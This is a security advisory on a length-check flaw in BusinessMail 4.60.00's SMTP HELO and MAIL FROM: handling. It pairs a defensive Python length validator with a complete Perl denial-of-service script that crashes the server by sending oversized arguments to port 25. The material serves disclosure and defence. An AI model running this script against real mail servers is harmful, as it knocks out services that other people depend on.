"BusinessMail is a powerful and yet easy to configure mail server that has been designed from its initial concept as a full Windows 32bit, multi-threaded system that will provide the power and flexibility of mail handling that is required by most business network environments."
Lack of proper length validation of two fields allows attackers to crash the BusinessMail email server system.
Credit:
The information has been provided by Reed Arvin.
The original article can be found at: http://reedarvin.thearvins.com/20050730-01.html
Vulnerable Systems:
* BusinessMail email server system 4.60.00
The input to the SMTP HELO and MAIL FROM: fields is not properly length-checked. An attacker who sends overly long data in the HELO and MAIL FROM: fields causes a buffer overflow, and the process crashes.
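The missing check, sketched from the defender's side as an added example (not part of the original advisory and not the vendor's code): a Python function that applies the RFC 5321 section 4.5.3.1 size limits to a raw SMTP command line before its arguments are parsed or copied. The function names, the reply texts after the numeric codes, and the sample lines are constructed for this example.

```python
import re

MAX_LINE = 512  # RFC 5321 limit for a whole command line, CRLF included

# (command pattern, what is measured, limit in octets, reply when exceeded)
ARG_LIMITS = [
    (re.compile(rb"(?:HELO|EHLO)[ \t]+(\S*)", re.I),
     "domain", 255, "501 Domain too long"),
    (re.compile(rb"MAIL FROM:[ \t]*(\S*)", re.I),
     "reverse-path", 256, "501 Path too long"),
]


def check_command(line):
    """Return a list of (reply, detail) tuples, one per exceeded limit."""
    problems = []
    if len(line) > MAX_LINE:
        problems.append(("500 Line too long",
                         "line is %d octets, limit %d" % (len(line), MAX_LINE)))
    for pattern, what, limit, reply in ARG_LIMITS:
        m = pattern.match(line)
        if m and len(m.group(1)) > limit:
            problems.append((reply, "%s is %d octets, limit %d"
                             % (what, len(m.group(1)), limit)))
    return problems


def reply_for(line):
    """First rejection reply for a line, or None when it is within limits."""
    problems = check_command(line)
    return problems[0][0] if problems else None


# Constructed sample lines: two ordinary commands and two oversized ones.
SAMPLE = [
    b"HELO mail.example.com\r\n",
    b"MAIL FROM:<alice@example.com>\r\n",
    b"HELO " + b"A" * 512 + b"\r\n",
    b"MAIL FROM:" + b"A" * 512 + b"\r\n",
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(line[:24], len(line), reply_for(line) or "accept")
```

The length test has to run on the received octet count before any argument is copied into a fixed-size buffer, and the network read itself must be bounded so that an unterminated line cannot grow without limit.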
Exploit:
#===== Start BusMail_SMTPDOS.pl =====
#
# Usage: BusMail_SMTPDOS.pl <ip>
# BusMail_SMTPDOS.pl 127.0.0.1
#
# BusinessMail email server system 4.60.00
#
# Download:
# http://www.netcplus.com/
#
##########################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "25",
Proto => "TCP"))
{
print "Attempting to kill BusinessMail SMTP server at $ARGV[0]:25...\n";
sleep(1);
print $socket "HELO " . "A" x 512 . "\r\n";
sleep(1);
print $socket "MAIL FROM:" . "A" x 512 . "\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:25\n";
}
#===== End BusMail_SMTPDOS.pl =====